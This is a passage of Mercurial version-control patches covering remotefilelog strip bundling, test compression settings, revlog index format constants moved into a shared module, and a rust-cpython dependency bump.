configitem(b'remotefilelog', b'backgroundprefetch', default=False) configitem(b'remotefilelog', b'prefetchdelay', default=120) configitem(b'remotefilelog', b'prefetchdays', default=14) +# Other values include 'local' or 'none'. Any unrecognized value is 'all'. 
+configitem(b'remotefilelog', b'strip.includefiles', default='all') configitem(b'remotefilelog', b'getfilesstep', default=10000) configitem(b'remotefilelog', b'getfilestype', default=b'optimistic') diff --git a/hgext/remotefilelog/shallowbundle.py b/hgext/remotefilelog/shallowbundle.py --- a/hgext/remotefilelog/shallowbundle.py +++ b/hgext/remotefilelog/shallowbundle.py @@ -104,6 +104,18 @@ if source == b"push" or source == b"bundle": return AllFiles + # We won't actually strip the files, but we should put them in any + # backup bundle generated by strip (especially for cases like narrow's + # `hg tracked --removeinclude`, as failing to do so means that the + # "saved" changesets during a strip won't have their files reapplied and + # thus their linknode adjusted, if necessary). + if source == b"strip": + cfg = repo.ui.config(b'remotefilelog', b'strip.includefiles') + if cfg == b'local': + return LocalFiles + elif cfg != b'none': + return AllFiles + caps = self._bundlecaps or [] if source == b"serve" or source == b"pull": if constants.BUNDLE2_CAPABLITY in caps: diff --git a/tests/test-remotefilelog-bgprefetch.t b/tests/test-remotefilelog-bgprefetch.t --- a/tests/test-remotefilelog-bgprefetch.t +++ b/tests/test-remotefilelog-bgprefetch.t @@ -63,6 +63,7 @@ > EOF $ hg strip tip saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/6b4b6f66ef8c-b4b8bdaf-backup.hg (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ clearcache $ hg pull diff --git a/tests/test-remotefilelog-bundles.t b/tests/test-remotefilelog-bundles.t --- a/tests/test-remotefilelog-bundles.t +++ b/tests/test-remotefilelog-bundles.t @@ -26,12 +26,12 @@ $ hg strip -r 66ee28d0328c 1 files updated, 0 files merged, 0 files removed, 0 files unresolved saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg (glob) - 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) + 2 files fetched over 2 fetches - (2 misses, 
0.00% hit ratio) over *s (glob) $ hg unbundle .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg adding changesets adding manifests adding file changes - added 2 changesets with 0 changes to 0 files + added 2 changesets with 2 changes to 1 files new changesets 66ee28d0328c:16db62c5946f (run 'hg update' to get a working copy) @@ -51,7 +51,7 @@ Pulling from a shallow bundle - $ hg strip -r 66ee28d0328c + $ hg strip -r 66ee28d0328c --config remotefilelog.strip.includefiles=none saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg (glob) $ hg pull -r 66ee28d0328c .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg pulling from .hg/strip-backup/66ee28d0328c-3d7aafd1-backup.hg @@ -63,12 +63,13 @@ new changesets 66ee28d0328c (1 drafts) (run 'hg update' to get a working copy) -Pulling from a full bundle +Pulling from a full bundle, also testing that strip produces a full bundle by +default. $ hg strip -r 66ee28d0328c saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg (glob) - $ hg pull -r 66ee28d0328c ../fullbundle.hg - pulling from ../fullbundle.hg + $ hg pull -r 66ee28d0328c .hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg + pulling from .hg/strip-backup/66ee28d0328c-b6ee89e7-backup.hg searching for changes abort: cannot pull from full bundles (use `hg unbundle` instead) diff --git a/tests/test-remotefilelog-local.t b/tests/test-remotefilelog-local.t --- a/tests/test-remotefilelog-local.t +++ b/tests/test-remotefilelog-local.t @@ -116,7 +116,7 @@ $ hg strip -r . 
2 files updated, 0 files merged, 1 files removed, 0 files unresolved saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/19edf50f4de7-df3d0f74-backup.hg (glob) - 4 files fetched over 2 fetches - (4 misses, 0.00% hit ratio) over *s (glob) + 3 files fetched over 2 fetches - (3 misses, 0.00% hit ratio) over *s (glob) # unbundle @@ -133,13 +133,14 @@ adding changesets adding manifests adding file changes - added 1 changesets with 0 changes to 0 files + added 1 changesets with 3 changes to 3 files new changesets 19edf50f4de7 (1 drafts) (run 'hg update' to get a working copy) + 2 files fetched over 1 fetches - (2 misses, 0.00% hit ratio) over *s (glob) $ hg up 3 files updated, 0 files merged, 0 files removed, 0 files unresolved - 4 files fetched over 1 fetches - (4 misses, 0.00% hit ratio) over *s (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ cat a a @@ -148,7 +149,7 @@ $ clearcache $ hg revert -r .~2 y z no changes needed to z - 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ hg checkout -C -r . -q # explicit bundle should produce full bundle file @@ -159,7 +160,7 @@ $ cd .. 
$ hgcloneshallow ssh://user@dummy/master shallow2 -q - 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) + 2 files fetched over 1 fetches - (2 misses, 0.00% hit ratio) over *s (glob) $ cd shallow2 $ hg unbundle ../local.bundle adding changesets diff --git a/tests/test-remotefilelog-prefetch.t b/tests/test-remotefilelog-prefetch.t --- a/tests/test-remotefilelog-prefetch.t +++ b/tests/test-remotefilelog-prefetch.t @@ -86,6 +86,7 @@ $ printf "[remotefilelog]\npullprefetch=bookmark()\n" >> .hg/hgrc $ hg strip tip saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/109c3a557a73-3f43405e-backup.hg (glob) + 1 files fetched over 1 fetches - (1 misses, 0.00% hit ratio) over *s (glob) $ clearcache $ hg pull diff --git a/tests/test-remotefilelog-sparse.t b/tests/test-remotefilelog-sparse.t --- a/tests/test-remotefilelog-sparse.t +++ b/tests/test-remotefilelog-sparse.t @@ -48,6 +48,7 @@ $ printf "[remotefilelog]\npullprefetch=bookmark()\n" >> .hg/hgrc $ hg strip tip saved backup bundle to $TESTTMP/shallow/.hg/strip-backup/876b1317060d-b2e91d8d-backup.hg (glob) + 2 files fetched over 2 fetches - (2 misses, 0.00% hit ratio) over *s (glob) $ hg debugsparse --delete z diff --git a/tests/test-remotefilelog-strip.t b/tests/test-remotefilelog-strip.t --- a/tests/test-remotefilelog-strip.t +++ b/tests/test-remotefilelog-strip.t @@ -60,8 +60,9 @@ | @ 0 b292c1e3311f -FIXME: This should point to a commit that actually exists in the repo. Otherwise -remotefilelog has to search every commit in the repository looking for a valid -linkrev every time it's queried, such as during push. +Demonstrate that the linknode points to a commit that is actually in the repo +after the strip operation. Otherwise remotefilelog has to search every commit in +the repository looking for a valid linkrev every time it's queried, such as +during push. 
$ hg debug-file-linknode -r 70494d a - df91f74b871e064c89afa1fe9e2f66afa2c125df + 70494d7ec5ef6cd3cd6939a9fd2812f9956bf553 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617727741 -7200 # Tue Apr 06 18:49:01 2021 +0200 # Node ID 19747c07ed3f20417dc89a88dfd7bbcc96cab41d # Parent 47a9527731c3c2aca078f949ce0980ea462f3c66 test: explicitly use zlib compression in tests/test-repo-compengines.t We need the implicit value to be explicit until we can change the default in some case. Differential Revision: https://phab.mercurial-scm.org/D10321 diff --git a/tests/test-repo-compengines.t b/tests/test-repo-compengines.t --- a/tests/test-repo-compengines.t +++ b/tests/test-repo-compengines.t @@ -1,5 +1,12 @@ A new repository uses zlib storage, which doesn't need a requirement + $ cat << EOF >> $HGRCPATH + > [format] + > # stabilize test accross variant + > revlog-compression=zlib + > EOF + + $ hg init default $ cd default $ cat .hg/requires # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617727832 -7200 # Tue Apr 06 18:50:32 2021 +0200 # Node ID 1a17c35fb9fd9e109b3ecdf22e682a9d610a961d # Parent 19747c07ed3f20417dc89a88dfd7bbcc96cab41d test: explicitly use zlib compression in tests/test-upgrade-repo.t We need the implicit value to be explicit until we can change the default in some case. 
Differential Revision: https://phab.mercurial-scm.org/D10322 diff --git a/tests/test-upgrade-repo.t b/tests/test-upgrade-repo.t --- a/tests/test-upgrade-repo.t +++ b/tests/test-upgrade-repo.t @@ -3,6 +3,9 @@ $ cat >> $HGRCPATH << EOF > [extensions] > share = + > [format] + > # stabilize test across variant + > revlog-compression=zlib > EOF store and revlogv1 are required in source @@ -1144,6 +1147,7 @@ > maxchainlen = 9001 > EOF $ hg config format + format.revlog-compression=$BUNDLE2_COMPRESSIONS$ format.maxchainlen=9001 $ hg debugdeltachain file rev chain# chainlen prev delta size rawsize chainsize ratio lindist extradist extraratio readsize largestblk rddensity srchunks # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617747127 -7200 # Wed Apr 07 00:12:07 2021 +0200 # Node ID 9dfcadc2cabb30ead0b40cfbb9d692217ca1af7d # Parent 1a17c35fb9fd9e109b3ecdf22e682a9d610a961d test: explicitly use zlib compression in tests/test-share-safe.t We need the implicit value to be explicit until we can change the default in some cases. Differential Revision: https://phab.mercurial-scm.org/D10323 diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -7,6 +7,9 @@ > use-share-safe = True > [storage] > revlog.persistent-nodemap.slow-path=allow + > # enforce zlib to ensure we can upgrade to zstd later + > [format] + > revlog-compression=zlib > EOF prepare source repo # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617790528 -7200 # Wed Apr 07 12:15:28 2021 +0200 # Node ID 3aa78f2aea4884371ee2d5f230692462f47e0d5e # Parent 9dfcadc2cabb30ead0b40cfbb9d692217ca1af7d revlog-compression: fix computation of engine availability We don't just need the engine to be defined, we need it to be available and able to be used for revlog compression.
Without this change, `zstd` could be selected as a viable option for repository creation on platform where it is not available. Differential Revision: https://phab.mercurial-scm.org/D10325 diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -3470,7 +3470,9 @@ compengines = ui.configlist(b'format', b'revlog-compression') for compengine in compengines: if compengine in util.compengines: - break + engine = util.compengines[compengine] + if engine.available() and engine.revlogheader(): + break else: raise error.Abort( _( diff --git a/mercurial/upgrade_utils/actions.py b/mercurial/upgrade_utils/actions.py --- a/mercurial/upgrade_utils/actions.py +++ b/mercurial/upgrade_utils/actions.py @@ -428,7 +428,9 @@ # return the first valid value as the selection code would do for comp in compengines: if comp in util.compengines: - return comp + e = util.compengines[comp] + if e.available() and e.revlogheader(): + return comp # no valide compression found lets display it all for clarity return b','.join(compengines) # HG changeset patch # User Valentin Gatien-Baron <vgatien-baron@janestreet.com> # Date 1617731359 14400 # Tue Apr 06 13:49:19 2021 -0400 # Node ID fbfb1d6d8459a06d0394872f65f5ceee9f180d47 # Parent 3aa78f2aea4884371ee2d5f230692462f47e0d5e revlog: fix error about unknown compression format in py3 In py2, the error is something like: abort: unknown compression type 'x'! In py3, we get the following unhelpful message: abort: unknown compression type <memory at 0x7f4650b5cdc8>! Switch to something like: abort: unknown compression type 78! 
Differential Revision: https://phab.mercurial-scm.org/D10318 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -13,6 +13,7 @@ from __future__ import absolute_import +import binascii import collections import contextlib import errno @@ -2296,7 +2297,9 @@ compressor = engine.revlogcompressor(self._compengineopts) self._decompressors[t] = compressor except KeyError: - raise error.RevlogError(_(b'unknown compression type %r') % t) + raise error.RevlogError( + _(b'unknown compression type %s') % binascii.hexlify(t) + ) return compressor.decompress(data) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617698267 -7200 # Tue Apr 06 10:37:47 2021 +0200 # Node ID eed3e2b79b48aa8a1cb2f0656c72126d715346b2 # Parent fbfb1d6d8459a06d0394872f65f5ceee9f180d47 store: document the `walk` method Differential Revision: https://phab.mercurial-scm.org/D10313 diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -452,7 +452,9 @@ return reversed(self._walk(b'', False)) def walk(self, matcher=None): - """yields (unencoded, encoded, size) + """return file related to data storage (ie: revlogs) + + yields (unencoded, encoded, size) if a matcher is passed, storage files of only those tracked paths are passed with matches the matcher # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617698275 -7200 # Tue Apr 06 10:37:55 2021 +0200 # Node ID 6afb5ef1e776e4b263e5c7873728b9601bb4e206 # Parent eed3e2b79b48aa8a1cb2f0656c72126d715346b2 store: drop the `filefilter` argument to `_walk` No code use it anywhere. Dropping it will help replacing the function with something with a more precise semantic. 
Differential Revision: https://phab.mercurial-scm.org/D10314 diff --git a/mercurial/store.py b/mercurial/store.py --- a/mercurial/store.py +++ b/mercurial/store.py @@ -411,7 +411,7 @@ def join(self, f): return self.path + b'/' + encodedir(f) - def _walk(self, relpath, recurse, filefilter=isrevlog): + def _walk(self, relpath, recurse): '''yields (unencoded, encoded, size)''' path = self.path if relpath: @@ -425,7 +425,7 @@ p = visit.pop() for f, kind, st in readdir(p, stat=True): fp = p + b'/' + f - if filefilter(f, kind, st): + if isrevlog(f, kind, st): n = util.pconvert(fp[striplen:]) l.append((decodedir(n), n, st.st_size)) elif kind == stat.S_IFDIR and recurse: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618040 -7200 # Mon Apr 05 12:20:40 2021 +0200 # Node ID aba724bf550e69ea6ed1fa5aec2680dcacc86941 # Parent 6afb5ef1e776e4b263e5c7873728b9601bb4e206 revlog: add some comment in the header sections We are about to add more content so let us organise the existing content first. Differential Revision: https://phab.mercurial-scm.org/D10302 diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ -11,11 +11,15 @@ from ..interfaces import repository -# revlog header flags +### main revlog header + +## revlog version REVLOGV0 = 0 REVLOGV1 = 1 # Dummy value until file format is finalized. REVLOGV2 = 0xDEAD + +## global revlog header flags # Shared across v1 and v2. FLAG_INLINE_DATA = 1 << 16 # Only used by v1, implied by v2. 
@@ -26,6 +30,8 @@ REVLOGV1_FLAGS = FLAG_INLINE_DATA | FLAG_GENERALDELTA REVLOGV2_FLAGS = FLAG_INLINE_DATA +### individual entry + # revlog index flags # For historical reasons, revlog's internal flags were exposed via the # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618052 -7200 # Mon Apr 05 12:20:52 2021 +0200 # Node ID 34e1fa4b548aedabaea646a918cba471f5266484 # Parent aba724bf550e69ea6ed1fa5aec2680dcacc86941 revlog: move the details of revlog "v0" index inside revlog.utils.constants the revlog module is quite large and this kind of format information would be handy for other modules. So let us start to gather this information about the format in a more appropriate place. Differential Revision: https://phab.mercurial-scm.org/D10303 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -41,6 +41,7 @@ from .revlogutils.constants import ( FLAG_GENERALDELTA, FLAG_INLINE_DATA, + INDEX_ENTRY_V0, REVLOGV0, REVLOGV1, REVLOGV1_FLAGS, @@ -218,19 +219,6 @@ node = attr.ib(default=None) -# index v0: -# 4 bytes: offset -# 4 bytes: compressed length -# 4 bytes: base rev -# 4 bytes: link rev -# 20 bytes: parent 1 nodeid -# 20 bytes: parent 2 nodeid -# 20 bytes: nodeid -indexformatv0 = struct.Struct(b">4l20s20s20s") -indexformatv0_pack = indexformatv0.pack -indexformatv0_unpack = indexformatv0.unpack - - class revlogoldindex(list): @property def nodemap(self): @@ -284,7 +272,7 @@ class revlogoldio(object): def __init__(self): - self.size = indexformatv0.size + self.size = INDEX_ENTRY_V0.size def parseindex(self, data, inline): s = self.size @@ -295,7 +283,7 @@ while off + s <= l: cur = data[off : off + s] off += s - e = indexformatv0_unpack(cur) + e = INDEX_ENTRY_V0.unpack(cur) # transform to revlogv1 format e2 = ( offset_type(e[0], 0), @@ -315,6 +303,13 @@ return index, None def packentry(self, entry, node, version, rev): + """return the binary representation of an entry + + entry: a
tuple containing all the values (see index.__getitem__) + node: a callback to convert a revision to nodeid + version: the changelog version + rev: the revision number + """ if gettype(entry[0]): raise error.RevlogError( _(b'index entry flags need revlog version 1') @@ -328,7 +323,7 @@ node(entry[6]), entry[7], ) - return indexformatv0_pack(*e2) + return INDEX_ENTRY_V0.pack(*e2) diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ -9,6 +9,8 @@ from __future__ import absolute_import +import struct + from ..interfaces import repository ### main revlog header @@ -32,6 +34,16 @@ ### individual entry +## index v0: +# 4 bytes: offset +# 4 bytes: compressed length +# 4 bytes: base rev +# 4 bytes: link rev +# 20 bytes: parent 1 nodeid +# 20 bytes: parent 2 nodeid +# 20 bytes: nodeid +INDEX_ENTRY_V0 = struct.Struct(b">4l20s20s20s") + # revlog index flags # For historical reasons, revlog's internal flags were exposed via the # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618061 -7200 # Mon Apr 05 12:21:01 2021 +0200 # Node ID cc65cea90edb704350e9987cf76a6953ea438f7c # Parent 34e1fa4b548aedabaea646a918cba471f5266484 revlog: move the details of revlog "v1" index inside revlog.utils.constants The revlog module is quite large and this kind of format information would be handy for other modules. So let us start to gather this information about the format in a more appropriate place. We update various references to this information to use the new "source of truth" in the process.
Differential Revision: https://phab.mercurial-scm.org/D10304 diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -17,6 +17,7 @@ ) from ..revlogutils import nodemap as nodemaputil +from ..revlogutils import constants as revlog_constants stringio = pycompat.bytesio @@ -43,13 +44,13 @@ class BaseIndexObject(object): # Format of an index entry according to Python's `struct` language - index_format = b">Qiiiiii20s12x" + index_format = revlog_constants.INDEX_ENTRY_V1.format # Size of a C unsigned long long int, platform independent big_int_size = struct.calcsize(b'>Q') # Size of a C long int, platform independent int_size = struct.calcsize(b'>i') # Size of the entire index format - index_size = struct.calcsize(index_format) + index_size = revlog_constants.INDEX_ENTRY_V1.size # An empty index entry, used as a default value to be overridden, or nullrev null_item = (0, 0, 0, -1, -1, -1, -1, nullid) diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -42,6 +42,7 @@ FLAG_GENERALDELTA, FLAG_INLINE_DATA, INDEX_ENTRY_V0, + INDEX_ENTRY_V1, REVLOGV0, REVLOGV1, REVLOGV1_FLAGS, @@ -326,18 +327,6 @@ return INDEX_ENTRY_V0.pack(*e2) -# index ng: -# 6 bytes: offset -# 2 bytes: flags -# 4 bytes: compressed length -# 4 bytes: uncompressed length -# 4 bytes: base rev -# 4 bytes: link rev -# 4 bytes: parent 1 rev -# 4 bytes: parent 2 rev -# 32 bytes: nodeid -indexformatng = struct.Struct(b">Qiiiiii20s12x") -indexformatng_pack = indexformatng.pack versionformat = struct.Struct(b">I") versionformat_pack = versionformat.pack versionformat_unpack = versionformat.unpack @@ -349,7 +338,7 @@ class revlogio(object): def __init__(self): - self.size = indexformatng.size + self.size = INDEX_ENTRY_V1.size def parseindex(self, data, inline): # call the C implementation to parse the index data @@ -357,7 +346,7 @@ return index, cache def packentry(self, entry, node, 
version, rev): - p = indexformatng_pack(*entry) + p = INDEX_ENTRY_V1.pack(*entry) if rev == 0: p = versionformat_pack(version) + p[4:] return p diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ -44,6 +44,19 @@ # 20 bytes: nodeid INDEX_ENTRY_V0 = struct.Struct(b">4l20s20s20s") +## index v1 +# 6 bytes: offset +# 2 bytes: flags +# 4 bytes: compressed length +# 4 bytes: uncompressed length +# 4 bytes: base rev +# 4 bytes: link rev +# 4 bytes: parent 1 rev +# 4 bytes: parent 2 rev +# 32 bytes: nodeid +INDEX_ENTRY_V1 = struct.Struct(b">Qiiiiii20s12x") +assert INDEX_ENTRY_V1.size == 32 * 2 + # revlog index flags # For historical reasons, revlog's internal flags were exposed via the # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618072 -7200 # Mon Apr 05 12:21:12 2021 +0200 # Node ID 85e3a630cad9aea93a2548a0a0fe329be74f7a11 # Parent cc65cea90edb704350e9987cf76a6953ea438f7c revlog: move the details of revlog "v2" index inside revlog.utils.constants the revlog module is quite large and this kind of format information would be handy for other modules. So let us start to gather this information about the format in a more appropriate place. We update various references to this information to use the new "source of truth" in the process.
Differential Revision: https://phab.mercurial-scm.org/D10305 diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -243,21 +243,8 @@ class Index2Mixin(object): - # 6 bytes: offset - # 2 bytes: flags - # 4 bytes: compressed length - # 4 bytes: uncompressed length - # 4 bytes: base rev - # 4 bytes: link rev - # 4 bytes: parent 1 rev - # 4 bytes: parent 2 rev - # 32 bytes: nodeid - # 8 bytes: sidedata offset - # 4 bytes: sidedata compressed length - # 20 bytes: Padding to align to 96 bytes (see RevlogV2Plan wiki page) - index_format = b">Qiiiiii20s12xQi20x" - index_size = struct.calcsize(index_format) - assert index_size == 96, index_size + index_format = revlog_constants.INDEX_ENTRY_V2.format + index_size = revlog_constants.INDEX_ENTRY_V2.size null_item = (0, 0, 0, -1, -1, -1, -1, nullid, 0, 0) def replace_sidedata_info(self, i, sidedata_offset, sidedata_length): diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -43,6 +43,7 @@ FLAG_INLINE_DATA, INDEX_ENTRY_V0, INDEX_ENTRY_V1, + INDEX_ENTRY_V2, REVLOGV0, REVLOGV1, REVLOGV1_FLAGS, @@ -87,7 +88,6 @@ storageutil, stringutil, ) -from .pure import parsers as pureparsers # blanked usage of all the name to prevent pyflakes constraints # We need these name available in the module for extensions. 
@@ -352,20 +352,16 @@ return p -indexformatv2 = struct.Struct(pureparsers.Index2Mixin.index_format) -indexformatv2_pack = indexformatv2.pack - - class revlogv2io(object): def __init__(self): - self.size = indexformatv2.size + self.size = INDEX_ENTRY_V2.size def parseindex(self, data, inline): index, cache = parsers.parse_index2(data, inline, revlogv2=True) return index, cache def packentry(self, entry, node, version, rev): - p = indexformatv2_pack(*entry) + p = INDEX_ENTRY_V2.pack(*entry) if rev == 0: p = versionformat_pack(version) + p[4:] return p diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ -57,6 +57,21 @@ INDEX_ENTRY_V1 = struct.Struct(b">Qiiiiii20s12x") assert INDEX_ENTRY_V1.size == 32 * 2 +# 6 bytes: offset +# 2 bytes: flags +# 4 bytes: compressed length +# 4 bytes: uncompressed length +# 4 bytes: base rev +# 4 bytes: link rev +# 4 bytes: parent 1 rev +# 4 bytes: parent 2 rev +# 32 bytes: nodeid +# 8 bytes: sidedata offset +# 4 bytes: sidedata compressed length +# 20 bytes: Padding to align to 96 bytes (see RevlogV2Plan wiki page) +INDEX_ENTRY_V2 = struct.Struct(b">Qiiiiii20s12xQi20x") +assert INDEX_ENTRY_V2.size == 32 * 3 + # revlog index flags # For historical reasons, revlog's internal flags were exposed via the # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618083 -7200 # Mon Apr 05 12:21:23 2021 +0200 # Node ID c6e23fb4bfb4b21ab02a713b84d377d09b91c660 # Parent 85e3a630cad9aea93a2548a0a0fe329be74f7a11 revlog: move the "index header" struct inside revlog.utils.constants The struct was previous called "version", but this is actually "version" + "flags". So header seems like a better name. The move to the `constants` module has the same motivation as the INDEX_ENTRY_V# ones. 
Differential Revision: https://phab.mercurial-scm.org/D10306 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -44,6 +44,7 @@ INDEX_ENTRY_V0, INDEX_ENTRY_V1, INDEX_ENTRY_V2, + INDEX_HEADER, REVLOGV0, REVLOGV1, REVLOGV1_FLAGS, @@ -327,10 +328,6 @@ return INDEX_ENTRY_V0.pack(*e2) -versionformat = struct.Struct(b">I") -versionformat_pack = versionformat.pack -versionformat_unpack = versionformat.unpack - # corresponds to uncompressed length of indexformatng (2 gigs, 4-byte # signed integer) _maxentrysize = 0x7FFFFFFF @@ -348,7 +345,7 @@ def packentry(self, entry, node, version, rev): p = INDEX_ENTRY_V1.pack(*entry) if rev == 0: - p = versionformat_pack(version) + p[4:] + p = INDEX_HEADER.pack(version) + p[4:] return p @@ -363,7 +360,7 @@ def packentry(self, entry, node, version, rev): p = INDEX_ENTRY_V2.pack(*entry) if rev == 0: - p = versionformat_pack(version) + p[4:] + p = INDEX_HEADER.pack(version) + p[4:] return p @@ -579,7 +576,7 @@ else: indexdata = f.read() if len(indexdata) > 0: - versionflags = versionformat_unpack(indexdata[:4])[0] + versionflags = INDEX_HEADER.unpack(indexdata[:4])[0] self._initempty = False else: versionflags = newversionflags diff --git a/mercurial/revlogutils/constants.py b/mercurial/revlogutils/constants.py --- a/mercurial/revlogutils/constants.py +++ b/mercurial/revlogutils/constants.py @@ -15,6 +15,8 @@ ### main revlog header +INDEX_HEADER = struct.Struct(b">I") + ## revlog version REVLOGV0 = 0 REVLOGV1 = 1 # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618118 -7200 # Mon Apr 05 12:21:58 2021 +0200 # Node ID 1dc86c2a43cedefe6f28ab4f988824b2b1fb438e # Parent c6e23fb4bfb4b21ab02a713b84d377d09b91c660 revlog: directly use the Struct object for related operation The Struct object has all the piece we needs, so no need to duplicate information on the revlog itself. 
Differential Revision: https://phab.mercurial-scm.org/D10307 diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -44,7 +44,7 @@ class BaseIndexObject(object): # Format of an index entry according to Python's `struct` language - index_format = revlog_constants.INDEX_ENTRY_V1.format + index_format = revlog_constants.INDEX_ENTRY_V1 # Size of a C unsigned long long int, platform independent big_int_size = struct.calcsize(b'>Q') # Size of a C long int, platform independent @@ -99,7 +99,7 @@ def append(self, tup): if '_nodemap' in vars(self): self._nodemap[tup[7]] = len(self) - data = _pack(self.index_format, *tup) + data = self.index_format.pack(*tup) self._extra.append(data) def _check_index(self, i): @@ -117,7 +117,7 @@ else: index = self._calculate_index(i) data = self._data[index : index + self.index_size] - r = _unpack(self.index_format, data) + r = self.index_format.unpack(data) if self._lgt and i == 0: r = (offset_type(0, gettype(r[0])),) + r[1:] return r @@ -243,7 +243,7 @@ class Index2Mixin(object): - index_format = revlog_constants.INDEX_ENTRY_V2.format + index_format = revlog_constants.INDEX_ENTRY_V2 index_size = revlog_constants.INDEX_ENTRY_V2.size null_item = (0, 0, 0, -1, -1, -1, -1, nullid, 0, 0) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617618132 -7200 # Mon Apr 05 12:22:12 2021 +0200 # Node ID c7c6c11fe1e4fd3b936b2145b112bd8006a88ba6 # Parent 1dc86c2a43cedefe6f28ab4f988824b2b1fb438e rust: bump rust-cpython version to 0.5.2 we need a newer version to define "property" on Rust defined object. 
Differential Revision: https://phab.mercurial-scm.org/D10308 diff --git a/rust/Cargo.lock b/rust/Cargo.lock --- a/rust/Cargo.lock +++ b/rust/Cargo.lock @@ -139,12 +139,13 @@ [[package]] name = "cpython" -version = "0.4.1" +version = "0.5.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "bfaf3847ab963e40c4f6dd8d6be279bdf74007ae2413786a0dcbb28c52139a95" +checksum = "0f11357af68648b6a227e7e2384d439cec8595de65970f45e3f7f4b2600be472" dependencies = [ "libc", "num-traits", + "paste", "python27-sys", "python3-sys", ] @@ -570,6 +571,25 @@ ] [[package]] +name = "paste" +version = "0.1.18" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "45ca20c77d80be666aef2b45486da86238fabe33e38306bd3118fe4af33fa880" +dependencies = [ + "paste-impl", + "proc-macro-hack", +] + +[[package]] +name = "paste-impl" +version = "0.1.18" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "d95a7db200b97ef370c8e6de0088252f7e0dfff7d047a28528e47456c0fc98b6" +dependencies = [ + "proc-macro-hack", +] + +[[package]] name = "pkg-config" version = "0.3.19" source = "registry+https://github.com/rust-lang/crates.io-index" @@ -610,9 +630,9 @@ [[package]] name = "python27-sys" -version = "0.4.1" +version = "0.5.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "67cb041de8615111bf224dd75667af5f25c6e032118251426fed7f1b70ce4c8c" +checksum = "f485897ed7048f5032317c4e427800ef9f2053355516524d73952b8b07032054" dependencies = [ "libc", "regex", @@ -620,9 +640,9 @@ [[package]] name = "python3-sys" -version = "0.4.1" +version = "0.5.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "90af11779515a1e530af60782d273b59ac79d33b0e253c071a728563957c76d4" +checksum = "5b29b99c6868eb02beb3bf6ed025c8bcdf02efc149b8e80347d3e5d059a806db" dependencies = [ "libc", "regex", diff --git a/rust/hg-cpython/Cargo.toml b/rust/hg-cpython/Cargo.toml --- a/rust/hg-cpython/Cargo.toml +++ 
